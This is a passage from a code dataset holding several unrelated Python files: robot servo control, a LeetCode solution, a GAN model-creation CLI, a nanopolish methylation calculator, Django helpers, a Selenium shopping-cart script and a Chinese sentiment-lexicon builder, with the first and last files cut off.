pos)\n moveMotorPos(LM_LEG_ID, LM_LEG_HOME + pos)\n moveMotorPos(LB_LEG_ID, LB_LEG_HOME + pos)\n # return (legsAtPos())\n\ndef moveLegsOffset(pos):\n moveMotorPos(RF_LEG_ID, pos)\n moveMotorPos(RM_LEG_ID, 4096 - LEG_OFFSET + pos)\n moveMotorPos(RB_LEG_ID, pos)\n moveMotorPos(LF_LEG_ID, LEG_OFFSET + pos)\n moveMotorPos(LM_LEG_ID, pos)\n moveMotorPos(LB_LEG_ID, LEG_OFFSET + pos)\n # return (legsAtPos())\n\ndef setAllLegsVel(vel):\n moveMotorVel(RF_LEG_ID, vel)\n moveMotorVel(RM_LEG_ID, vel)\n moveMotorVel(RB_LEG_ID, vel)\n moveMotorVel(LF_LEG_ID, vel)\n moveMotorVel(LM_LEG_ID, vel)\n moveMotorVel(LB_LEG_ID, vel)\n\ndef setOffsetLegsVel(vel):\n moveMotorVel(RM_LEG_ID, vel)\n moveMotorVel(LF_LEG_ID, vel)\n moveMotorVel(LB_LEG_ID, vel)\n\ndef setNonOffsetLegsVel(vel):\n moveMotorVel(RF_LEG_ID, vel)\n moveMotorVel(RB_LEG_ID, vel)\n moveMotorVel(LM_LEG_ID, vel)\n\n# def moveLegsRelative(pos):\n# switchControlModeAllLegs(XL_POSITION_CONTROL)\n# moveLegsFromHome(pos)\n# switchControlModeAllLegs(XL_EXT_POSITION_CONTROL)\n\n# def offsetLegsFromHome():\n# moveMotorPos(RF_LEG_ID, RF_LEG_HOME)\n# moveMotorPos(RM_LEG_ID, RM_LEG_HOME - LEG_OFFSET)\n# moveMotorPos(RB_LEG_ID, RB_LEG_HOME)\n# moveMotorPos(LF_LEG_ID, LF_LEG_HOME + LEG_OFFSET)\n# moveMotorPos(LM_LEG_ID, LM_LEG_HOME)\n# moveMotorPos(LB_LEG_ID, LB_LEG_HOME + LEG_OFFSET)\n\n# while not (atPosition(RF_LEG_HOME, getPos(RF_LEG_ID)) and atPosition(LF_LEG_HOME + LEG_OFFSET, getPos(LF_LEG_ID))):\n# print(\"Offsetting Legs\", RF_LEG_HOME, getPos(RF_LEG_ID), LF_LEG_HOME + LEG_OFFSET, getPos(LF_LEG_ID))\n# time.sleep(0.01)\n\ndef setProfileVelocity(id, vel):\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler, id, XL_PROFILE_VELOCITY, vel)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\ndef setAllLegProfileVelocity(vel):\n setProfileVelocity(RF_LEG_ID, vel)\n moveMotorPos(RF_LEG_ID, getPosGoal(RF_LEG_ID))\n setProfileVelocity(RM_LEG_ID, vel)\n moveMotorPos(RM_LEG_ID, getPosGoal(RM_LEG_ID))\n setProfileVelocity(RB_LEG_ID, vel)\n moveMotorPos(RB_LEG_ID, getPosGoal(RB_LEG_ID))\n setProfileVelocity(LF_LEG_ID, vel)\n moveMotorPos(LF_LEG_ID, getPosGoal(LF_LEG_ID))\n setProfileVelocity(LM_LEG_ID, vel)\n moveMotorPos(LM_LEG_ID, getPosGoal(LM_LEG_ID))\n setProfileVelocity(LB_LEG_ID, vel)\n moveMotorPos(LB_LEG_ID, getPosGoal(LB_LEG_ID))\n\ndef setOffsetLegProfileVelocity(vel):\n setProfileVelocity(RM_LEG_ID, vel)\n moveMotorPos(RM_LEG_ID, getPosGoal(RM_LEG_ID))\n setProfileVelocity(LF_LEG_ID, vel)\n moveMotorPos(LF_LEG_ID, getPosGoal(LF_LEG_ID))\n setProfileVelocity(LB_LEG_ID, vel)\n moveMotorPos(LB_LEG_ID, getPosGoal(LB_LEG_ID))\n\ndef setNonOffsetLegProfileVelocity(vel):\n setProfileVelocity(RF_LEG_ID, vel)\n moveMotorPos(RF_LEG_ID, getPosGoal(RF_LEG_ID))\n setProfileVelocity(RB_LEG_ID, vel)\n moveMotorPos(RB_LEG_ID, getPosGoal(RB_LEG_ID))\n setProfileVelocity(LM_LEG_ID, vel)\n moveMotorPos(LM_LEG_ID, getPosGoal(LM_LEG_ID))\n\n\ndef enableAll():\n enableTorque(RF_LEG_ID)\n enableTorque(RM_LEG_ID)\n enableTorque(RB_LEG_ID)\n enableTorque(LF_LEG_ID)\n enableTorque(LM_LEG_ID)\n enableTorque(LB_LEG_ID)\n enableTorque(TAIL_YAW_ID)\n enableTorque(TAIL_PITCH_ID)\n enableTorque(R_WING_ID)\n enableTorque(L_WING_ID)\n\ndef disableAll():\n disableTorque(RF_LEG_ID)\n disableTorque(RM_LEG_ID)\n disableTorque(RB_LEG_ID)\n disableTorque(LF_LEG_ID)\n disableTorque(LM_LEG_ID)\n disableTorque(LB_LEG_ID)\n 
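# leg servos are handled above; the tail and wing servos follow\n 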
disableTorque(TAIL_PITCH_ID)\n disableTorque(TAIL_YAW_ID)\n disableTorque(R_WING_ID)\n disableTorque(L_WING_ID)\n\n## for motor testing:\n\nenableAll()\ndisableAll()\n\n# Close port\n# portHandler.closePort()\n\nprint(\"Imported MotorControl\")\n","sub_path":"MFRv1/MFRv1_MotorControl.py","file_name":"MFRv1_MotorControl.py","file_ext":"py","file_size_in_byte":11031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"411754009","text":"\n\n# class header\nclass _INCLEMENT():\n\tdef __init__(self): \n\t\tself.name = \"INCLEMENT\"\n\t\tself.definitions = [u'Inclement weather is unpleasant, especially with cold wind and rain.']\n\n\t\tself.parents = []\n\t\tself.children = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_inclement.py","file_name":"_inclement.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"166467655","text":"#\n# @lc app=leetcode id=378 lang=python3\n#\n# [378] Kth Smallest Element in a Sorted Matrix\n#\n# https://leetcode.com/problems/kth-smallest-element-in-a-sorted-matrix/description/\n#\n# algorithms\n# Medium (50.48%)\n# Total Accepted: 126.3K\n# Total Submissions: 249.8K\n# Testcase Example: '[[1,5,9],[10,11,13],[12,13,15]]\\n8'\n#\n# Given a n x n matrix where each of the rows and columns are sorted in\n# ascending order, find the kth smallest element in the matrix.\n# \n# \n# Note that it is the kth smallest element in the sorted order, not the kth\n# distinct element.\n# \n# \n# Example:\n# \n# matrix = [\n# ⁠ [ 1, 5, 9],\n# ⁠ [10, 11, 13],\n# ⁠ [12, 13, 15]\n# ],\n# k = 8,\n# \n# return 13.\n# \n# \n# \n# Note: \n# You may assume k is always valid, 1 ≤ k ≤ n^2.\n#\nimport bisect\nclass Solution:\n # def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n def kthSmallest(self, matrix, k: int) -> int:\n # print(matrix)\n n = len(matrix[0])\n k -= 1\n # q, r = divmod(k, col_length)\n # print(q, r)\n # return matrix[q][r]\n l = matrix[0]\n for r in range(1,n):\n for i in matrix[r]:\n bisect.insort(l, i)\n # print(l)\n # print(k)\n return l[k]\n\n\n\n# s = Solution()\n# matrix = [\n# [ 1, 5, 9],\n# [10, 11, 13],\n# [12, 13, 15]]\n# k = 8\n# print(s.kthSmallest(matrix, k)) \n\n\n# matrix = [[1,2],[1,3]]\n# k = 2 \n# print(s.kthSmallest(matrix, k)) # 1\n# k = 1 \n# print(s.kthSmallest(matrix, k)) # 1\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python/378.kth-smallest-element-in-a-sorted-matrix.py","file_name":"378.kth-smallest-element-in-a-sorted-matrix.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"602431103","text":"# -*- coding: utf-8 -*-\n\nimport argparse\n\nfrom latent_gan.runners.CreateModelRunner import CreateModelRunner\n\n\ndef main():\n \"\"\"Create a model with the vocabulary extracted from a SMILES file.\"\"\"\n parser = argparse.ArgumentParser(description=\"Create a model with the vocabulary extracted from a SMILES file.\")\n\n parser.add_argument(\"--input-data-path\", \"-i\", help=\"The path to a data file.\", type=str, required=True)\n parser.add_argument(\"--output-model-folder\", \"-o\", help=\"Prefix to the folder to save output model.\", type=str)\n 
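# optional: dimensionality of the latent noise vector fed to the generator\n 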
parser.add_argument(\"--latent_dim\", \"-ld\", help=\"dimensionality of the noise\", type=int)\n args = {k: v for k, v in vars(parser.parse_args()).items() if v is not None}\n\n runner = CreateModelRunner(**args)\n runner.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/latent_gan/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"409224445","text":"# -*- coding: utf-8 -*-\n\n# Script inspired from https://github.com/jts/nanopolish/blob/master/scripts/calculate_methylation_frequency.py\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~IMPORTS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n# Standard library imports\nfrom collections import *\nimport csv\nimport datetime\n\n# Third party imports\nfrom tqdm import tqdm\n\n# Local imports\nfrom NanopolishComp.common import *\nfrom NanopolishComp import __version__ as package_version\nfrom NanopolishComp import __name__ as package_name\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~MAIN CLASS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\nclass Freq_meth_calculate():\n\n def __init__ (self,\n input_fn:\"str\",\n output_bed_fn:\"str\"=\"\",\n output_tsv_fn:\"str\"=\"\",\n min_llr:\"float\"=2.5,\n min_depth:\"int\"=10,\n min_meth_freq:\"float\"=0.05,\n verbose:\"bool\"=False,\n quiet:\"bool\"=False):\n \"\"\"\n Calculate methylation frequency at genomic CpG sites from the output of nanopolish call-methylation\n * input_fn\n Path to a nanopolish call_methylation tsv output file\n * output_bed_fn\n Path to write a summary result file in BED format\n * output_tsv_fn\n Path to write an more extensive result report in TSV format\n * min_llr\n Log likelihood ratio threshold\n * min_depth\n Minimal number of reads covering a site to be reported\n * min_meth_freq\n Minimal methylation frequency of a site to be reported\n * verbose\n Increase verbosity\n * quiet\n Reduce verbosity\n \"\"\"\n\n # Save init options in dict for later\n kwargs = locals()\n\n # Define overall verbose level\n self.log = get_logger(name=\"Freq_meth_calculate\", verbose=verbose, quiet=quiet)\n\n # Print option summary log\n self.log.debug (\"## Options summary ##\")\n self.log.debug (\"\\tpackage_name: {}\".format(package_name))\n self.log.debug (\"\\tpackage_version: {}\".format(package_version))\n self.log.debug (\"\\ttimestamp: {}\".format(str(datetime.datetime.now())))\n self.log.debug (dict_to_str(kwargs, nsep=1, exclude_list=[\"self\"]))\n\n # Verify parameters validity\n self.log.warning (\"## Checking arguments ##\")\n\n # Try to read input file if not a stream\n self.log.debug(\"\\tTesting input file readability\")\n if input_fn != 0 and not file_readable (input_fn):\n raise IOError (\"Cannot read input file\")\n\n # Verify that at least one output file is given:\n self.log.debug(\"\\tCheck output file\")\n if not output_bed_fn and not output_tsv_fn:\n raise NanopolishCompError(\"At least one output file should be given\")\n if output_bed_fn:\n mkdir (os.path.dirname(output_bed_fn), exist_ok=True)\n self.log.debug(\"\\t\\tOutput results in bed format\")\n if output_tsv_fn:\n mkdir (os.path.dirname(output_tsv_fn), exist_ok=True)\n self.log.debug(\"\\t\\tOutput results in tsv format\")\n\n # Create self variables\n self.counter = Counter()\n self.input_fn = input_fn\n self.output_bed_fn = output_bed_fn\n self.output_tsv_fn = output_tsv_fn\n self.min_llr = min_llr\n self.min_depth = min_depth\n self.min_meth_freq = min_meth_freq\n\n self.log.warning 
(\"## Parsing methylation_calls file ##\")\n self._parse_methylation_calls ()\n self.log.info (\"## Results summary ##\")\n self.log.info (dict_to_str(self.counter, nsep=1))\n\n def _parse_methylation_calls(self):\n \"\"\"\"\"\"\n\n # Create collection to store results\n site_dict = defaultdict(list)\n\n try:\n input_fp = open (self.input_fn, \"r\")\n self.log.debug (\"\\tWrite output file header\")\n if self.output_bed_fn:\n output_bed_fp = open (self.output_bed_fn, \"w\")\n output_bed_fp.write(Site.BED_header()+\"\\n\")\n if self.output_tsv_fn:\n output_tsv_fp = open (self.output_tsv_fn, \"w\")\n output_tsv_fp.write(Site.TSV_header()+\"\\n\")\n\n self.log.info (\"\\tStarting to parse file Nanopolish methylation call file\")\n header_line = input_fp.readline()\n byte_offset = len(header_line)\n lp = LineParser(header_line, sep=\"\\t\", cast_numeric_field=True)\n\n for line in input_fp:\n self.counter[\"Total read lines\"]+=1\n byte_len = len(line)\n l = lp(line)\n\n if not l:\n # Failsafe if line is malformed\n self.counter[\"Invalid read line\"]+=1\n else:\n # Store byte offset corresponding to appropriate line\n self.counter[\"Valid read lines\"]+=1\n site_dict[(l.chromosome, l.strand, l.start)].append(byte_offset)\n byte_offset += byte_len\n\n self.log.info (\"\\tProcessing_valid site found\")\n for k, offset_list in site_dict.items():\n self.counter[\"Total sites\"]+=1\n\n # If low coverage unset list to release memory\n if len(offset_list) < self.min_depth:\n self.counter[\"Low coverage sites\"]+=1\n site_dict[k] = []\n\n # If sufficient coverage, process site\n else:\n # Get all read lines corresponding to current site\n ll = []\n for offset in offset_list:\n input_fp.seek(offset, 0)\n ll.append (lp(input_fp.readline()))\n\n # Parse list with helper class Site\n site = Site(ll, self.min_llr)\n if site.meth_freq < self.min_meth_freq:\n self.counter[\"Low methylation sites\"]+=1\n else:\n self.counter[\"Valid sites\"]+=1\n if self.output_bed_fn:\n output_bed_fp.write(site.to_bed()+\"\\n\")\n if self.output_tsv_fn:\n output_tsv_fp.write(site.to_tsv()+\"\\n\")\n finally:\n input_fp.close()\n if self.output_bed_fn:\n output_bed_fp.close()\n if self.output_tsv_fn:\n output_tsv_fp.close()\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HELPER CLASS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\nclass Site ():\n \"\"\"Structure like class to store site information\"\"\"\n\n # Class id dispatcher\n ID = 0\n @classmethod\n def next_id (cls):\n id = cls.ID\n cls.ID +=1\n return id\n\n @classmethod\n def BED_header (cls):\n return \"track name='nanopolish_methylation' description='Methylation frequency track generated with nanopolish/NanopolishComp' useScore=1\"\n\n @classmethod\n def TSV_header (cls):\n return \"\\t\".join([\"chromosome\",\"start\",\"end\",\"strand\",\"site_id\",\"methylated_reads\",\"unmethylated_reads\",\"ambiguous_reads\",\"sequence\",\"num_motifs\",\"meth_freq\"])\n\n def __init__ (self, ll, min_llr):\n \"\"\"\"\"\"\n self.total = len(ll)\n self.methylated = 0\n self.unmethylated = 0\n self.ambiguous = 0\n self.id = self.next_id()\n self.sequence = ll[0].sequence\n self.num_motifs = ll[0].num_motifs\n self.chromosome = ll[0].chromosome\n self.start = ll[0].start\n self.end = ll[0].end+1\n self.strand = ll[0].strand\n\n for l in ll:\n # Count read methylation call per site\n if l.log_lik_ratio >= min_llr:\n self.methylated+=1\n elif l.log_lik_ratio <= -min_llr:\n self.unmethylated+=1\n else:\n self.ambiguous+=1\n\n self.meth_freq = self.methylated/self.total\n\n def __repr__(self):\n return 
\"{}:{}-{}({}) / id:{} / reads:{} / meth_freq:{:03}\".format(\n self.chromosome,\n self.start,\n self.end,\n self.strand,\n self.id,\n self.total,\n self.meth_freq)\n\n def to_bed (self):\n \"\"\"\"\"\"\n return \"{}\\t{}\\t{}\\t{}\\t{:06}\\t{}\".format(\n self.chromosome,\n self.start,\n self.end,\n self.id,\n int(self.meth_freq*1000),\n self.strand)\n\n def to_tsv (self):\n \"\"\"\"\"\"\n return \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{:.6f}\".format(\n self.chromosome,\n self.start,\n self.end,\n self.strand,\n self.id,\n self.methylated,\n self.unmethylated,\n self.ambiguous,\n self.sequence,\n self.num_motifs,\n self.meth_freq)\n","sub_path":"NanopolishComp/Freq_meth_calculate.py","file_name":"Freq_meth_calculate.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"547892720","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nimport django\nfrom django.http import HttpResponse\nfrom django.conf import settings\n\nfrom ...common.misc import ResponseBuilder\nfrom .. import CommonStatus\n\nif django.VERSION >= (1, 7): # pragma: nocover\n\n def get_cache(name):\n from django.core.cache import caches\n return caches[name]\nelse:\n from django.core.cache import get_cache # pragma: nocover\n\n\"\"\"\nmisc tools\n\"\"\"\n\n\nclass ResponseContext(ResponseBuilder):\n \"\"\"\n 响应数据构造\n \"\"\"\n def response_json(self, context, ensure_ascii=True, indent=0):\n \"\"\"response json\"\"\"\n response = super(ResponseContext, self).response_json(context, ensure_ascii=True, indent=0)\n response = HttpResponse(response, content_type=\"application/json\")\n if context.get(\"code\", \"\") == CommonStatus.NOT_LOGIN.code:\n response[\"aos-errorcode\"] = CommonStatus.NOT_LOGIN.code\n return response\n\n def response_pb(self, context):\n \"\"\"response protobuffer\"\"\"\n raise NotImplementedError\n\n def __call__(self, request, context=None, statuscode=None, code=None, msg=None, result=None,\n add_response=False):\n \"\"\"\n 构造响应数据\n :param request: django请求对象\n :param context: 响应数据字典 type:dict\n :param statuscode: 错误状态对象\n :param code: 自定义错误码,为空则使用状态对象中的错误码\n :param msg: 错误信息,为空则使用错误对象中的msg\n :param result: 响应结果状态,默认为None,自动判断 type: bool\n :return str 序列化json数据或pb流\n \"\"\"\n response = super(ResponseContext, self).__call__(context, statuscode=statuscode, code=code, msg=msg,\n version=settings.VERSION,\n result=None,\n add_response=add_response)\n\n output = request.parameters.get('output')\n if output == 'pb':\n return self.response_pb(response)\n else:\n return self.response_json(response)\n\n\ndef get_clientip(request, distinct=True):\n \"\"\"\n 获得客户端ip\n :param request:\n :return: clientip or ''\n \"\"\"\n serverip = request.META.get(\"HTTP_NS_CLIENT_IP\") # NAT模式新加的header\n if not serverip or serverip.lower() == 'unknown':\n serverip = request.META.get('HTTP_X_FORWARDED_FOR') or ''\n if not serverip or serverip.lower() == 'unknown':\n serverip = request.META.get('HTTP_PROXY_CLIENT_IP') or ''\n if not serverip or serverip.lower() == \"unknown\":\n serverip = request.META.get('HTTP_WL_PROXY_CLIENT_IP') or ''\n if not serverip or serverip.lower() == 'unknown':\n serverip = request.META.get('REMOTE_ADDR') or ''\n if serverip and serverip.lower() != \"unknown\":\n if distinct:\n serverip_list = []\n for ip in serverip.split(','):\n ip = ip.strip()\n if ip and ip not in serverip_list:\n serverip_list.append(ip)\n serverip = ','.join(serverip_list)\n return serverip\n return 
''\n\n\ndef smart_config_import(config_path):\n '''Automatically pick the environment-specific module to import based on ENV_TYPE in settings\n\n @config_path -- the __file__ value of the config file; may be an absolute or a relative path\n '''\n abs_path = os.path.abspath(config_path)\n # get the path relative to BASE_DIR\n module_split = os.path.splitext(abs_path)[0].replace(settings.BASE_DIR + '/', '').split('/')\n env_type = getattr(settings, 'ENV_TYPE', 'dev').lower()\n # assemble the full dotted path of the module to import\n smart_module_name = '%s.%s.%s' % ('.'.join(module_split[:-1]), env_type, module_split[-1])\n # strip the intermediate '.dev'\n smart_module_name = smart_module_name.replace('.dev.', '.')\n return 'from %s import *' % smart_module_name\n","sub_path":"libs/djangos/misc/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"484938945","text":"from selenium import webdriver\r\nimport time\r\ndriver = webdriver.Chrome() # create the browser\r\ndriver.get(\"https://www.suning.com/\") # open the Suning site\r\ndriver.maximize_window() # maximize the window\r\ndriver.find_element_by_xpath(\"//*[@id='searchKeywords']\").send_keys(\"iphone13\") # type the item to buy\r\ndriver.find_element_by_xpath(\"//*[@id='searchSubmit']\").click() # click search\r\ndriver.implicitly_wait(2) # implicit wait of 2 seconds\r\ntime.sleep(3) # sleep 3 seconds for the page to respond\r\ndriver.find_element_by_xpath('//*[@id=\"ssdsn_search_pro_baoguang-1-0-1_1_01:0000000000_12314319126\"]/i/img').click() # pick the phone\r\ndriver.implicitly_wait(2) # implicit wait of 2 seconds\r\nhandle = driver.window_handles # get all window handles\r\ndriver.switch_to.window(handle[1]) # switch to the newly opened window\r\ndriver.find_element_by_xpath('//*[@id=\"colorItemList\"]/dd/ul/li[11]/a/span').click() # pick the phone storage option\r\ndriver.implicitly_wait(2) # implicit wait of 2 seconds\r\nhandle = driver.window_handles # get all window handles\r\ndriver.switch_to.window(handle[1]) # switch to the newly opened window\r\ntime.sleep(3) # sleep 3 seconds\r\ndriver.find_element_by_xpath(\"//*[@id='addCart']\").click() # click add to cart # item successfully added to cart\r\n","sub_path":"autoweb02/苏宁购物.py","file_name":"苏宁购物.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"201714667","text":"import pandas as pd\nimport random\nimport collections\nfrom gensim.models import word2vec\nimport numpy as np\nimport jieba.posseg as peg\nimport copy\nfrom sklearn. 
feature_extraction.text import CountVectorizer, TfidfTransformer\n# sentiment polarity score computation\n\n\n\n# load the HowNet sentiment lexicons and the Chinese sentiment vocabulary ontology lexicon\npath0='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/正面评价词语(中文).txt'\npath1='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/负面评价词语(中文).txt'\npath2='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/正面情感词语(中文).txt'\npath3='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/负面情感词语(中文).txt'\npath4='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/程度级别词语(中文).txt'\n\n\npath5='C:/Users/Administrator/Desktop/data/台湾大学NTUSD简体中文情感词典/ntusd-negative.txt'\npath6='C:/Users/Administrator/Desktop/data/台湾大学NTUSD简体中文情感词典/ntusd-positive.txt'\n### National Taiwan University (NTUSD) sentiment lexicon\nsentiment_taiwan_dict={}\nwith open(path5,'r',encoding='utf-8') as f:\n for word in f.readlines():\n words=word.lstrip('\\ufeff').rstrip('\\n')\n sentiment_taiwan_dict[words]=2\n f.close()\n \nwith open(path6,'r',encoding='utf-8') as f:\n for word in f.readlines():\n words=word.lstrip('\\ufeff').rstrip('\\n')\n sentiment_taiwan_dict[words]=1\n f.close()\n\n# HowNet sentiment lexicon\ndef getdata0(path):\n data=[]\n with open(path, 'r',encoding ='utf-8') as f:\n for line in f.readlines():\n if line[0].isdigit():\n continue\n else:\n if line != '\\n':\n lines=line.strip().split(' ')\n data.extend(lines)\n f.close()\n data.pop(0)\n return data\ndef getdata(path_list):\n type_list=['正面','负面','正面','负面']\n final_data={}\n for i in range(len(path_list)-1):\n data0=getdata0(path_list[i])\n for word in data0:\n if type_list[i]=='正面':\n jx=1\n elif type_list[i]=='负面':\n jx=2\n final_data[word]=jx\n print('{0} words loaded'.format(type_list[i]))\n data={}\n pp=['程度most','程度very','程度over','程度more','程度shao','程度insufficiently']\n print(pp)\n i=0\n with open (path_list[-1],'r',encoding='utf-8') as f:\n for line in f.readlines():\n if line[0].isdigit():\n print(line[0])\n i+=1\n continue\n if line != '\\n':\n #print(i)\n lines=line.strip().split('\\n')[0]\n #print(lines)\n if lines not in data.keys():\n data[lines]=3\n print('degree adverbs loaded')\n f.close()\n data.pop('\\ufeff中文程度级别词语\\t\\t219(个数)')\n final_data=dict(final_data,**data)\n return final_data\n\n\nsentiment_hownet_word=getdata([path0,path1,path2,path3,path4])\nsentiment_two=sentiment_taiwan_dict\nfor word,jx in sentiment_hownet_word.items():\n if word in sentiment_two.keys():\n continue\n sentiment_two[word]=jx\n\n\n#sentiment_dict1=dict(sentiment_taiwan_dict,**sentiment_hownet_word)\n\n\n# process the polarities from the sentiment vocabulary ontology\npath5='C:/Users/Administrator/Desktop/data/情感词汇本体/情感词汇本体.csv'\ndata_0=pd.read_csv(path5,engine='python')\ndata_0['极性']=data_0['极性'].map({0:0,1:1,2:2,3:3,7:0})\nsentiment_dalian_word=dict(zip(data_0['词语'],data_0['极性']))\n#sentiment_dict=dict(sentiment_dalian_word,**sentiment_dict1)\nsentiment_dict=sentiment_two\nfor word, jx in sentiment_dalian_word.items():\n if word in sentiment_dict.keys():\n continue\n sentiment_dict[word]=jx\n\nprint('total sentiment dictionary size:',len(sentiment_dict))\n\n# write out the merged sentiment dictionary (a dict)\nf=open('C:/Users/Administrator/Desktop/data/corpus/sentiment_dict_goujian.txt','w',encoding='utf-8')\nf.write(str(sentiment_dict))\nf.close()\n\n\n# look up sentiment for the words in the corpus\npath_neg = 'C:/Users/Administrator/Desktop/data/corpus/train_neg_cup_corpus.txt'\npath_pos = 'C:/Users/Administrator/Desktop/data/corpus/train_pos_cup_corpus.txt'\n\nprint('start loading the corpus')\ncorpus_neg=[]\ncorpus_pos=[]\n\ncorpus_word_list={}\nprint(' loading train neg')\nwith open(path_neg, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n lines = line.lstrip('\\ufeff').rstrip('\\n').split(' ')\n doc = []\n #print(lines)\n for word_flag in lines:\n word, flag = 
word_flag.split('_')\n #print(word, flag)\n if len(word)>=2:\n if word not in corpus_word_list.keys() :\n corpus_word_list[word] = flag\n doc.append(word)\n #print(doc)\n corpus_neg.append(doc)\n f.close()\nprint(' loading train pos')\nwith open(path_pos, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n lines = line.lstrip('\\ufeff').rstrip('\\n').split(' ')\n doc = []\n #print(lines)\n for word_flag in lines:\n word, flag = word_flag.split('_')\n #print(word, flag)\n if len(word)>=2:\n if word not in corpus_word_list.keys() :\n corpus_word_list[word] = flag\n doc.append(word)\n #print(doc)\n corpus_pos.append(doc)\n f.close()\n\n\ntrain_text_neg=corpus_neg\ntrain_text_pos=corpus_pos\n\n\nall_text_neg=train_text_neg\nall_text_pos=train_text_pos\n\n\nfcorpus={'正面':all_text_pos,'反面':all_text_neg}\n\n\ncorpus0=corpus_pos+corpus_neg\ncorpus_total=corpus0\n\n\n\nsentence=set()\nfor doc in corpus_total:\n sentence.add(' '.join(doc))\n\nwith open('C:/Users/Administrator/Desktop/data/corpus/corpus_total_1.txt','w',encoding='utf-8') as f:\n for doc in corpus_total:\n f.write(str(doc))\n f.close()\n\n# word2vec: train word vectors and query the most similar words\nmodel=word2vec.Word2Vec(corpus_total,size=500,window=5,min_count=1,workers=5)\n# vectorizer = CountVectorizer()\n# transformer = TfidfTransformer()\n# tfidf = transformer.fit_transform(vectorizer.fit_transform(sentence))\n# weight_doc=coo_matrix(tfidf.toarray())\n# word_list_c=vectorizer.vocabulary_\n# word_weight=weight_doc.T\nprint('start building sentiment dictionary info for corpus words and producing the processed corpus')\n\n\n\n\n\ndef get_corpus_sentiment(text_neg,text_pos):\n corpus_neg=text_neg\n corpus_pos=text_pos\n fcorpus={'正面':corpus_pos,'反面':corpus_neg}\n\n# derive sentiment labels for the words in the corpus\n# look corpus words up in the sentiment dictionary; verbs are dropped outright, as are time words, person names and place names,\n def getcorpussentiment(fcorpus):\n sentiment_corpus_total={}\n corpus=copy.deepcopy(fcorpus)\n word_list = list(sentiment_dict.keys())\n cunzai_word={}\n nocunzai_word={}\n shanchu_word={'正面':[],'反面':[]}\n for typ1 ,cor in fcorpus.items():\n for index_doc,doc in enumerate(cor):\n ui=[]\n for index_word,word in enumerate(doc):\n if word in word_list:\n cunzai_word[word] = typ1\n sentiment_corpus_total[word] = sentiment_dict[word]\n else:\n # print('no',word)\n if corpus_word_list[word]=='t' or corpus_word_list[word]=='ns'\\\n or corpus_word_list[word]=='s' or corpus_word_list[word]=='b'or corpus_word_list[word]=='nt' or \\\n corpus_word_list[word]=='nr' or corpus_word_list[word]=='m' or corpus_word_list[word]=='n':\n ui.append((word, index_doc))\n else:\n nocunzai_word[word] = typ1\n shanchu_word[typ1].append(ui)\n\n for ty1,da in shanchu_word.items():\n for doc in da:\n for word ,index_doc in doc:\n # print('del word')\n # print(doc,word)\n # print(corpus[ty1][index_doc])\n corpus[ty1][index_doc].remove(word)\n print(len(sentiment_corpus_total))\n\n #print('删除之后corpus')\n #print(list(nocunzai_word.keys())[:10])\n print('after removing v/nr/ns, {0} corpus words appear in sentiment_dict'.format(len(cunzai_word)))\n print('after removing v/nr/ns, {0} corpus words do not appear in sentiment_dict'.format(len(nocunzai_word)))\n pp=0\n for word,ty in nocunzai_word.items():\n similar_word_list=model.most_similar(word)\n #print(similar_word)\n flag=0\n #print(word)\n #print(similar_word_list)\n try:\n for similar_word in similar_word_list:\n #print(similar_word)\n if similar_word[0] in sentiment_corpus_total.keys() :\n #print(similar_word[0])\n sentiment_corpus_total[word] = sentiment_corpus_total[similar_word[0]]\n print('word:({0}) found similar_word:({1}) with existing sentiment info'.format(word, similar_word[0]))\n flag = 1\n break\n elif similar_word[0] in word_list:\n 
